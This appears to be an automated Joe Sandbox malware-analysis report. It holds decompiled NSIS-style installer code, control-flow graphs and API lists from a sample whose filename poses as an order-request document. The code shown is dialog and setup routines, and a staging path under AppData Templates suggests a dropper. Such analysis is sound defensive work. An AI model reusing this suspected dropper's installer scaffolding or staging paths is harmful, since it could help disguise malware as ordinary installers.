                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 0xc)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0x10)));
                                                						if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x48));
                                                							 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x34)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x48));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}
                                                0x0040209e
                                                0x004020a8
                                                0x004020b2
                                                0x004020bc
                                                0x004020c7
                                                0x004020ca
                                                0x004020e4
                                                0x004020e7
                                                0x004020ed
                                                0x004020f0
                                                0x004020fa
                                                0x004020fe
                                                0x004020fe
                                                0x00402103
                                                0x00402114
                                                0x0040211c
                                                0x004021d3
                                                0x004021d3
                                                0x004021da
                                                0x00402122
                                                0x00402122
                                                0x00402131
                                                0x00402135
                                                0x00402138
                                                0x0040213e
                                                0x0040214c
                                                0x0040214f
                                                0x00402151
                                                0x0040215c
                                                0x0040215c
                                                0x00402161
                                                0x00402163
                                                0x0040216a
                                                0x0040216a
                                                0x0040216d
                                                0x00402176
                                                0x00402179
                                                0x0040217f
                                                0x00402181
                                                0x0040218b
                                                0x0040218b
                                                0x0040218e
                                                0x00402197
                                                0x0040219a
                                                0x004021a3
                                                0x004021a9
                                                0x004021ab
                                                0x004021b9
                                                0x004021b9
                                                0x004021bc
                                                0x004021c2
                                                0x004021c2
                                                0x004021c5
                                                0x004021cb
                                                0x004021d1
                                                0x004021e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004021d1
                                                0x004021dc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00402154
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                • API String ID: 542301482-2561518016
                                                • Opcode ID: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                • Instruction ID: d47fca260cdd8e4185df19bb7459501af9c1372a1639466ce8116fcd6c853d94
                                                • Opcode Fuzzy Hash: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                • Instruction Fuzzy Hash: 2D414C71A00209AFCF00DFA4CD88AAD7BB5FF48314B20456AF515EB2D1DBB99A41CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403c1e-403c30 302 403d71-403d80 301->302 303 403c36-403c3c 301->303 305 403d82-403dbd GetDlgItem * 2 call 4040f6 KiUserCallbackDispatcher call 40140b 302->305 306 403dcf-403de4 302->306 303->302 304 403c42-403c4b 303->304 307 403c60-403c63 304->307 308 403c4d-403c5a SetWindowPos 304->308 328 403dc2-403dca 305->328 310 403e24-403e29 call 404142 306->310 311 403de6-403de9 306->311 313 403c65-403c77 ShowWindow 307->313 314 403c7d-403c83 307->314 308->307 318 403e2e-403e49 310->318 316 403deb-403df6 call 401389 311->316 317 403e1c-403e1e 311->317 313->314 319 403c85-403c9a DestroyWindow 314->319 320 403c9f-403ca2 314->320 316->317 338 403df8-403e17 SendMessageW 316->338 317->310 323 4040c3 317->323 324 403e52-403e58 318->324 325 403e4b-403e4d call 40140b 318->325 327 4040a0-4040a6 319->327 329 403ca4-403cb0 SetWindowLongW 320->329 330 403cb5-403cbb 320->330 326 4040c5-4040cc 323->326 334 404081-40409a DestroyWindow EndDialog 324->334 335 403e5e-403e69 324->335 325->324 327->323 332 4040a8-4040ae 327->332 328->306 329->326 336 403cc1-403cd2 GetDlgItem 330->336 337 403d5e-403d6c call 40415d 330->337 332->323 340 4040b0-4040b9 ShowWindow 332->340 334->327 335->334 341 403e6f-403ebc call 406054 call 4040f6 * 3 GetDlgItem 335->341 342 403cf1-403cf4 336->342 343 403cd4-403ceb SendMessageW IsWindowEnabled 336->343 337->326 338->326 340->323 371 403ec6-403f02 ShowWindow KiUserCallbackDispatcher call 404118 EnableWindow 341->371 372 403ebe-403ec3 341->372 346 403cf6-403cf7 342->346 347 403cf9-403cfc 342->347 343->323 343->342 349 403d27-403d2c call 4040cf 346->349 350 403d0a-403d0f 347->350 351 403cfe-403d04 347->351 349->337 352 403d45-403d58 SendMessageW 350->352 354 403d11-403d17 350->354 351->352 353 403d06-403d08 351->353 352->337 353->349 357 403d19-403d1f call 40140b 354->357 358 403d2e-403d37 call 40140b 354->358 367 403d25 357->367 358->337 368 403d39-403d43 358->368 367->349 368->367 375 403f04-403f05 371->375 376 403f07 371->376 372->371 377 403f09-403f37 GetSystemMenu EnableMenuItem SendMessageW 375->377 376->377 378 403f39-403f4a SendMessageW 377->378 379 403f4c 377->379 380 403f52-403f90 call 40412b call 406032 lstrlenW call 406054 SetWindowTextW call 401389 378->380 379->380 380->318 389 403f96-403f98 380->389 389->318 390 403f9e-403fa2 389->390 391 403fc1-403fd5 DestroyWindow 390->391 392 403fa4-403faa 390->392 391->327 394 403fdb-404008 CreateDialogParamW 391->394 392->323 393 403fb0-403fb6 392->393 393->318 395 403fbc 393->395 394->327 396 40400e-404065 call 4040f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 394->396 395->323 396->323 401 404067-40407a ShowWindow call 404142 396->401 403 40407f 401->403 403->327
                                                C-Code - Quality: 84%
                                                			E00403C1E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                				struct HWND__* _v32;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t37;
                                                				signed int _t39;
                                                				signed int _t41;
                                                				struct HWND__* _t51;
                                                				signed int _t69;
                                                				struct HWND__* _t75;
                                                				signed int _t88;
                                                				struct HWND__* _t93;
                                                				signed int _t101;
                                                				int _t105;
                                                				signed int _t117;
                                                				signed int _t118;
                                                				int _t119;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				long _t132;
                                                				int _t134;
                                                				int _t135;
                                                				void* _t136;
                                                				void* _t144;
                                                
                                                				_t117 = _a8;
                                                				if(_t117 == 0x110 || _t117 == 0x408) {
                                                					_t37 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t117 - 0x110;
                                                					 *0x7a1f28 = _t37;
                                                					if(_t117 == 0x110) {
                                                						 *0x7a8a48 = _t127;
                                                						 *0x7a1f3c = GetDlgItem(_t127, 1);
                                                						_t93 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x79ff08 = _t93;
                                                						E004040F6(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a28); // executed
                                                						 *0x7a7a0c = E0040140B(4);
                                                						_t37 = 1;
                                                						__eflags = 1;
                                                						 *0x7a1f28 = 1;
                                                					}
                                                					_t124 =  *0x40a388; // 0x0
                                                					_t135 = 0;
                                                					_t132 = (_t124 << 6) +  *0x7a8a60;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L34:
                                                						E00404142(0x40b);
                                                						while(1) {
                                                							_t39 =  *0x7a1f28;
                                                							 *0x40a388 =  *0x40a388 + _t39;
                                                							_t132 = _t132 + (_t39 << 6);
                                                							_t41 =  *0x40a388; // 0x0
                                                							__eflags = _t41 -  *0x7a8a64;
                                                							if(_t41 ==  *0x7a8a64) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x7a7a0c - _t135; // 0x0
                                                							if(__eflags != 0) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a388 -  *0x7a8a64; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t118 =  *(_t132 + 0x14);
                                                							E00406054(_t118, _t127, _t132, 0x7b8000,  *((intOrPtr*)(_t132 + 0x24)));
                                                							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E004040F6(_t127);
                                                							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E004040F6(_t127);
                                                							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E004040F6(_t127);
                                                							_t51 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x7a8acc - _t135;
                                                							_v32 = _t51;
                                                							if( *0x7a8acc != _t135) {
                                                								_t118 = _t118 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t118;
                                                							}
                                                							ShowWindow(_t51, _t118 & 0x00000008); // executed
                                                							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
                                                							E00404118(_t118 & 0x00000002);
                                                							_t119 = _t118 & 0x00000004;
                                                							EnableWindow( *0x79ff08, _t119);
                                                							__eflags = _t119 - _t135;
                                                							if(_t119 == _t135) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t135);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
                                                							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
                                                							__eflags =  *0x7a8acc - _t135;
                                                							if( *0x7a8acc == _t135) {
                                                								_push( *0x7a1f3c);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t135);
                                                								_push( *0x79ff08);
                                                							}
                                                							E0040412B();
                                                							E00406032(0x7a1f40, "Overcaustically Setup");
                                                							E00406054(0x7a1f40, _t127, _t132,  &(0x7a1f40[lstrlenW(0x7a1f40)]),  *((intOrPtr*)(_t132 + 0x18)));
                                                							SetWindowTextW(_t127, 0x7a1f40); // executed
                                                							_push(_t135);
                                                							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
                                                							__eflags = _t69;
                                                							if(_t69 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t132 - _t135;
                                                								if( *_t132 == _t135) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t132 + 4) - 5;
                                                								if( *(_t132 + 4) != 5) {
                                                									DestroyWindow( *0x7a7a18); // executed
                                                									 *0x7a0f18 = _t132;
                                                									__eflags =  *_t132 - _t135;
                                                									if( *_t132 <= _t135) {
                                                										goto L58;
                                                									}
                                                									_t75 = CreateDialogParamW( *0x7a8a40,  *_t132 +  *0x7a7a20 & 0x0000ffff, _t127,  *(0x40a38c +  *(_t132 + 4) * 4), _t132); // executed
                                                									__eflags = _t75 - _t135;
                                                									 *0x7a7a18 = _t75;
                                                									if(_t75 == _t135) {
                                                										goto L58;
                                                									}
                                                									_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                									_push(6);
                                                									E004040F6(_t75);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
                                                									ScreenToClient(_t127, _t136 + 0x10);
                                                									SetWindowPos( *0x7a7a18, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
                                                									_push(_t135);
                                                									E00401389( *((intOrPtr*)(_t132 + 0xc)));
                                                									__eflags =  *0x7a7a0c - _t135; // 0x0
                                                									if(__eflags != 0) {
                                                										goto L61;
                                                									}
                                                									ShowWindow( *0x7a7a18, 8); // executed
                                                									E00404142(0x405);
                                                									goto L58;
                                                								}
                                                								__eflags =  *0x7a8acc - _t135;
                                                								if( *0x7a8acc != _t135) {
                                                									goto L61;
                                                								}
                                                								__eflags =  *0x7a8ac0 - _t135;
                                                								if( *0x7a8ac0 != _t135) {
                                                									continue;
                                                								}
                                                								goto L61;
                                                							}
                                                						}
                                                						DestroyWindow( *0x7a7a18);
                                                						 *0x7a8a48 = _t135;
                                                						EndDialog(_t127,  *0x7a0710);
                                                						goto L58;
                                                					} else {
                                                						__eflags = _t37 - 1;
                                                						if(_t37 != 1) {
                                                							L33:
                                                							__eflags =  *_t132 - _t135;
                                                							if( *_t132 == _t135) {
                                                								goto L61;
                                                							}
                                                							goto L34;
                                                						}
                                                						_push(0);
                                                						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
                                                						__eflags = _t88;
                                                						if(_t88 == 0) {
                                                							goto L33;
                                                						}
                                                						SendMessageW( *0x7a7a18, 0x40f, 0, 1);
                                                						__eflags =  *0x7a7a0c - _t135; // 0x0
                                                						return 0 | __eflags == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t135 = 0;
                                                					if(_t117 == 0x47) {
                                                						SetWindowPos( *0x7a1f20, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					if(_t117 == 5) {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x7a1f20,  ~(_a12 - 1) & _t117);
                                                					}
                                                					if(_t117 != 0x40d) {
                                                						__eflags = _t117 - 0x11;
                                                						if(_t117 != 0x11) {
                                                							__eflags = _t117 - 0x111;
                                                							if(_t117 != 0x111) {
                                                								L26:
                                                								return E0040415D(_t117, _a12, _a16);
                                                							}
                                                							_t134 = _a12 & 0x0000ffff;
                                                							_t128 = GetDlgItem(_t127, _t134);
                                                							__eflags = _t128 - _t135;
                                                							if(_t128 == _t135) {
                                                								L13:
                                                								__eflags = _t134 - 1;
                                                								if(_t134 != 1) {
                                                									__eflags = _t134 - 3;
                                                									if(_t134 != 3) {
                                                										_t129 = 2;
                                                										__eflags = _t134 - _t129;
                                                										if(_t134 != _t129) {
                                                											L25:
                                                											SendMessageW( *0x7a7a18, 0x111, _a12, _a16);
                                                											goto L26;
                                                										}
                                                										__eflags =  *0x7a8acc - _t135;
                                                										if( *0x7a8acc == _t135) {
                                                											_t101 = E0040140B(3);
                                                											__eflags = _t101;
                                                											if(_t101 != 0) {
                                                												goto L26;
                                                											}
                                                											 *0x7a0710 = 1;
                                                											L21:
                                                											_push(0x78);
                                                											L22:
                                                											E004040CF();
                                                											goto L26;
                                                										}
                                                										E0040140B(_t129);
                                                										 *0x7a0710 = _t129;
                                                										goto L21;
                                                									}
                                                									__eflags =  *0x40a388 - _t135; // 0x0
                                                									if(__eflags <= 0) {
                                                										goto L25;
                                                									}
                                                									_push(0xffffffff);
                                                									goto L22;
                                                								}
                                                								_push(_t134);
                                                								goto L22;
                                                							}
                                                							SendMessageW(_t128, 0xf3, _t135, _t135);
                                                							_t105 = IsWindowEnabled(_t128);
                                                							__eflags = _t105;
                                                							if(_t105 == 0) {
                                                								goto L61;
                                                							}
                                                							goto L13;
                                                						}
                                                						SetWindowLongW(_t127, _t135, _t135);
                                                						return 1;
                                                					} else {
                                                						DestroyWindow( *0x7a7a18);
                                                						 *0x7a7a18 = _a12;
                                                						L58:
                                                						if( *0x7a3f40 == _t135) {
                                                							_t144 =  *0x7a7a18 - _t135; // 0x103ae
                                                							if(_t144 != 0) {
                                                								ShowWindow(_t127, 0xa); // executed
                                                								 *0x7a3f40 = 1;
                                                							}
                                                						}
                                                						L61:
                                                						return 0;
                                                					}
                                                				}
                                                			}
                                                0x00403c27
                                                0x00403c30
                                                0x00403d71
                                                0x00403d75
                                                0x00403d79
                                                0x00403d7b
                                                0x00403d80
                                                0x00403d8b
                                                0x00403d96
                                                0x00403d9b
                                                0x00403d9d
                                                0x00403d9f
                                                0x00403da2
                                                0x00403da7
                                                0x00403db5
                                                0x00403dc2
                                                0x00403dc9
                                                0x00403dc9
                                                0x00403dca
                                                0x00403dca
                                                0x00403dcf
                                                0x00403dd5
                                                0x00403ddc
                                                0x00403de2
                                                0x00403de4
                                                0x00403e24
                                                0x00403e29
                                                0x00403e2e
                                                0x00403e2e
                                                0x00403e33
                                                0x00403e3c
                                                0x00403e3e
                                                0x00403e43
                                                0x00403e49
                                                0x00403e4d
                                                0x00403e4d
                                                0x00403e52
                                                0x00403e58
                                                0x00000000
                                                0x00000000
                                                0x00403e63
                                                0x00403e69
                                                0x00000000
                                                0x00000000
                                                0x00403e72
                                                0x00403e7a
                                                0x00403e7f
                                                0x00403e82
                                                0x00403e88
                                                0x00403e8d
                                                0x00403e90
                                                0x00403e96
                                                0x00403e9b
                                                0x00403e9e
                                                0x00403ea4
                                                0x00403eac
                                                0x00403eb2
                                                0x00403eb8
                                                0x00403ebc
                                                0x00403ec3
                                                0x00403ec3
                                                0x00403ec3
                                                0x00403ecd
                                                0x00403edf
                                                0x00403eeb
                                                0x00403ef0
                                                0x00403efa
                                                0x00403f00
                                                0x00403f02
                                                0x00403f07
                                                0x00403f04
                                                0x00403f04
                                                0x00403f04
                                                0x00403f17
                                                0x00403f2f
                                                0x00403f31
                                                0x00403f37
                                                0x00403f4c
                                                0x00403f39
                                                0x00403f42
                                                0x00403f44
                                                0x00403f44
                                                0x00403f52
                                                0x00403f62
                                                0x00403f78
                                                0x00403f7f
                                                0x00403f85
                                                0x00403f89
                                                0x00403f8e
                                                0x00403f90
                                                0x00000000
                                                0x00403f96
                                                0x00403f96
                                                0x00403f98
                                                0x00000000
                                                0x00000000
                                                0x00403f9e
                                                0x00403fa2
                                                0x00403fc7
                                                0x00403fcd
                                                0x00403fd3
                                                0x00403fd5
                                                0x00000000
                                                0x00000000
                                                0x00403ffb
                                                0x00404001
                                                0x00404003
                                                0x00404008
                                                0x00000000
                                                0x00000000
                                                0x0040400e
                                                0x00404011
                                                0x00404014
                                                0x0040402b
                                                0x00404037
                                                0x00404050
                                                0x00404056
                                                0x0040405a
                                                0x0040405f
                                                0x00404065
                                                0x00000000
                                                0x00000000
                                                0x0040406f
                                                0x0040407a
                                                0x00000000
                                                0x0040407a
                                                0x00403fa4
                                                0x00403faa
                                                0x00000000
                                                0x00000000
                                                0x00403fb0
                                                0x00403fb6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403fbc
                                                0x00403f90
                                                0x00404087
                                                0x00404093
                                                0x0040409a
                                                0x00000000
                                                0x00403de6
                                                0x00403de6
                                                0x00403de9
                                                0x00403e1c
                                                0x00403e1c
                                                0x00403e1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403e1e
                                                0x00403deb
                                                0x00403def
                                                0x00403df4
                                                0x00403df6
                                                0x00000000
                                                0x00000000
                                                0x00403e06
                                                0x00403e0e
                                                0x00000000
                                                0x00403e14
                                                0x00403c42
                                                0x00403c42
                                                0x00403c46
                                                0x00403c4b
                                                0x00403c5a
                                                0x00403c5a
                                                0x00403c63
                                                0x00403c6c
                                                0x00403c77
                                                0x00403c77
                                                0x00403c83
                                                0x00403c9f
                                                0x00403ca2
                                                0x00403cb5
                                                0x00403cbb
                                                0x00403d5e
                                                0x00000000
                                                0x00403d67
                                                0x00403cc1
                                                0x00403cce
                                                0x00403cd0
                                                0x00403cd2
                                                0x00403cf1
                                                0x00403cf1
                                                0x00403cf4
                                                0x00403cf9
                                                0x00403cfc
                                                0x00403d0c
                                                0x00403d0d
                                                0x00403d0f
                                                0x00403d45
                                                0x00403d58
                                                0x00000000
                                                0x00403d58
                                                0x00403d11
                                                0x00403d17
                                                0x00403d30
                                                0x00403d35
                                                0x00403d37
                                                0x00000000
                                                0x00000000
                                                0x00403d39
                                                0x00403d25
                                                0x00403d25
                                                0x00403d27
                                                0x00403d27
                                                0x00000000
                                                0x00403d27
                                                0x00403d1a
                                                0x00403d1f
                                                0x00000000
                                                0x00403d1f
                                                0x00403cfe
                                                0x00403d04
                                                0x00000000
                                                0x00000000
                                                0x00403d06
                                                0x00000000
                                                0x00403d06
                                                0x00403cf6
                                                0x00000000
                                                0x00403cf6
                                                0x00403cdc
                                                0x00403ce3
                                                0x00403ce9
                                                0x00403ceb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ceb
                                                0x00403ca7
                                                0x00000000
                                                0x00403c85
                                                0x00403c8b
                                                0x00403c95
                                                0x004040a0
                                                0x004040a6
                                                0x004040a8
                                                0x004040ae
                                                0x004040b3
                                                0x004040b9
                                                0x004040b9
                                                0x004040ae
                                                0x004040c3
                                                0x00000000
                                                0x004040c3
                                                0x00403c83

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C5A
                                                • ShowWindow.USER32(?), ref: 00403C77
                                                • DestroyWindow.USER32 ref: 00403C8B
                                                • SetWindowLongW.USER32 ref: 00403CA7
                                                • GetDlgItem.USER32 ref: 00403CC8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CDC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403CE3
                                                • GetDlgItem.USER32 ref: 00403D91
                                                • GetDlgItem.USER32 ref: 00403D9B
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403DB5
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E06
                                                • GetDlgItem.USER32 ref: 00403EAC
                                                • ShowWindow.USER32(00000000,?), ref: 00403ECD
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDF
                                                • EnableWindow.USER32(?,?), ref: 00403EFA
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F10
                                                • EnableMenuItem.USER32 ref: 00403F17
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F42
                                                • lstrlenW.KERNEL32(007A1F40,?,007A1F40,Overcaustically Setup), ref: 00403F6B
                                                • SetWindowTextW.USER32(?,007A1F40), ref: 00403F7F
                                                • ShowWindow.USER32(?,0000000A), ref: 004040B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                • String ID: Overcaustically Setup
                                                • API String ID: 3906175533-1715260814
                                                • Opcode ID: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                • Instruction ID: cca83e8e3ea8fbb2d4c878b4d098dd65b90ea533b8cc41e08898a63a3c4fefdb
                                                • Opcode Fuzzy Hash: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                • Instruction Fuzzy Hash: FFC1BE71504204AFDB20AF61ED84E2B7BA8EB86745F00893EF641B11F0CB3D9952DB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 404 40387b-403893 call 406408 407 403895-4038a5 call 405f79 404->407 408 4038a7-4038de call 405eff 404->408 417 403901-40392a call 403b51 call 405aee 407->417 413 4038e0-4038f1 call 405eff 408->413 414 4038f6-4038fc lstrcatW 408->414 413->414 414->417 422 403930-403935 417->422 423 4039bc-4039c4 call 405aee 417->423 422->423 424 40393b-403963 call 405eff 422->424 429 4039d2-4039f7 LoadImageW 423->429 430 4039c6-4039cd call 406054 423->430 424->423 431 403965-403969 424->431 433 403a78-403a80 call 40140b 429->433 434 4039f9-403a29 RegisterClassW 429->434 430->429 435 40397b-403987 lstrlenW 431->435 436 40396b-403978 call 405a13 431->436 445 403a82-403a85 433->445 446 403a8a-403a95 call 403b51 433->446 437 403b47 434->437 438 403a2f-403a73 SystemParametersInfoW CreateWindowExW 434->438 443 403989-403997 lstrcmpiW 435->443 444 4039af-4039b7 call 4059e6 call 406032 435->444 436->435 442 403b49-403b50 437->442 438->433 443->444 449 403999-4039a3 GetFileAttributesW 443->449 444->423 445->442 457 403a9b-403ab5 ShowWindow call 40639c 446->457 458 403b1e-403b1f call 405264 446->458 452 4039a5-4039a7 449->452 453 4039a9-4039aa call 405a32 449->453 452->444 452->453 453->444 465 403ac1-403ad3 GetClassInfoW 457->465 466 403ab7-403abc call 40639c 457->466 461 403b24-403b26 458->461 463 403b40-403b42 call 40140b 461->463 464 403b28-403b2e 461->464 463->437 464->445 467 403b34-403b3b call 40140b 464->467 470 403ad5-403ae5 GetClassInfoW RegisterClassW 465->470 471 403aeb-403b0e DialogBoxParamW call 40140b 465->471 466->465 467->445 470->471 475 403b13-403b1c call 4037cb 471->475 475->442
                                                C-Code - Quality: 96%
                                                			E0040387B(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				intOrPtr _t41;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x7a8a50;
                                                				_t22 = E00406408(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x7a1f40;
                                                					L"1033" = 0x30;
                                                					 *0x7b5002 = 0x78;
                                                					 *0x7b5004 = 0;
                                                					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f40, 0);
                                                					__eflags =  *0x7a1f40;
                                                					if(__eflags == 0) {
                                                						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040838C, 0x7a1f40, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00405F79(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403B51(_t78, _t90);
                                                				_t86 = L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis";
